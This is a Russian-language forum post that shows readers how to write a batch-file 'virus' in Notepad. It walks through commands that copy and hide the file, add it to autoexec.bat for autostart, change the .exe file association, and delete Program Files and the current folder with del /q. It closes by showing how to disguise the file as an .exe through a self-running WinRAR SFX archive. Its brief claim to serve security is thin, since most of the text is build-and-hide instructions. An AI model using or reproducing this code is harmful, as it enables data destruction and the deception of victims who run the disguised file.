Пишем вирус в блокноте

Тема в разделе "Статьи и литература по заработку", создана пользователем Дмитрий89, 23.10.2017.

  1. Дмитрий89 Обитатель

    Дмитрий89
    Открыть профиль
    Статус:
    Вне сети
    Регистрация:
    05.05.2017
    Сообщения:
    368
    Симпатии:
    239
    Telegram:
    Звучит громко, на самом деле это самая простая вариация вредоносного ПО. Те кто всерьез занимаются написанием вирусов - можете смело листать дальше.

    Как написать вирус в блокноте?



    [​IMG]

    Не думайте, пожалуйста, что знания о том, как пишутся вирусы, нужны только вирусописателям! В целях компьютерной безопасности они не менее важны и простым пользователям. Даже поверхностное понимание того, как написать вирусы в блокноте, поможет защитить компьютер от многих неприятностей.

    Пишем вирус в блокноте

    Вот так выглядит вирус, набранный в обыкновенном блокноте, который есть в составе любой системы от Microsoft Windows. Но знайте — это сложно назвать вирусом, просто системные команды, они сохраняются в формате .bat. Для изменения расширений, нужно настроить систему:

    • Открываем «Компьютер»
    • Заходим верхнее в меню «Сервис», если не видно жмем ALT
    • В этом меню заходим в «Сервис»выбираем пункт «Параметры папок»
    • Заходим во вкладку «Вид» и ищем пункт «Скрывать расширения для зарегистрированных типов файлов»
    • Убираем галочку с этого пункта.
    [​IMG]
    Пишем вирус в блокноте


    С первого взгляда ничего страшного — всего несколько коротких слов-команд. Но на деле, если поместить этот файл в системную папку «system32\drivers\etc» и прописать его в автозагрузку, чтобы он запускался при загрузке системы, то, после перезапуска компьютера, невозможно будет открыть какую-либо программу или выбрать другое действие на рабочем столе. Не рекомендуется повторять эти действия, если нет навыков работы с системным реестром!

    Вместо telnetdrive.bat попробуйте вписать безопасные команды для запуска: Calc (калькулятора), Taskmgr (диспетчера задач) или Mspaint (программы рисования). Не забудь о

    Вы не можете просматривать внешние ссылки, что-бы просмотреть зарегистрируйтесь или авторизуйтесь на форуме !



    С чего начать

    Пришло время изучить небольшую общую инструкцию по «изготовлению» таких файлов.

    • Первым делом открываем блокнот;
    • Заносим туда команды, т.е. создаём в нём «тело» вируса;
    • Сохраняем свой труд через Файл -> Сохранить как;
    • Теперь осталось изменить расширение файла .txt на .bat и, вместо сохранённого названия, вписать нужное, которое будет использоваться.
    Создаём первый файл-вирус

    Простой вирус написан и сохранён в файл. Теперь бы неплохо узнать, что же прописали в тело вируса, сохранённого в файле.

    [​IMG]
    Создаём первый файл-вирус


    Начинаем разбираться по порядку с первой строки:

    1. @Echo off – без этой команды всё, что написано, высвечивалось бы на экране монитора.
    2. Date11.14 – указывает на дату создания.
    3. If exist c:sky.bat goto abc – проверка существования на диске С файла sky.bat и если его нет
    4. Copy %0 c:sky.bat – размножает себя, изменив первоначальное имя файла на sky.bat
    5. Attrib +h c:sky.bat – скрывает созданный файл от посторонних глаз.
    6. Echo c:sky.bat >>autoexec.bat – вирус прописывается в автозагрузку.
    7. :abc – если он есть, выполнение программы перейдёт сюда.
    Далее идут небольшие шалости:

    1. md CRECK – создаёт нужную или ненужную папку, смотря какая цель у создателя вируса.
    2. md NEW – такими папками можно заполнить весь жёсткий диск у пользователя.
    3. Label E: LUZER – прописывает название логического диска Е. В данном случае LUZER.
    4. assoc .exe=.mp3 – расширение .exe будет ассоциироваться, как .mp
    5. del c:Program Files /q –всё, что было в папке Program Files удалится.
    6. del *.* /q – из каталога, где находится вирус, удалится всё, кроме папки с самим вирусом.
    Повеселились достаточно, подумаем и о законе:

    1. del %0 – вирус наделает дел и удалит сам себя.
    Осталось последнее, узнать, как же его прячут. Просто! Переформатируют файл из расширения .bat в .exe при помощи архиватора WinRAR. При создании архива помечают – «Создать архив SFX» и устанавливают отметку «Выполнить после распаковки». Естественно, указывают настоящее имя, под которым создан вирус.
     
Загрузка...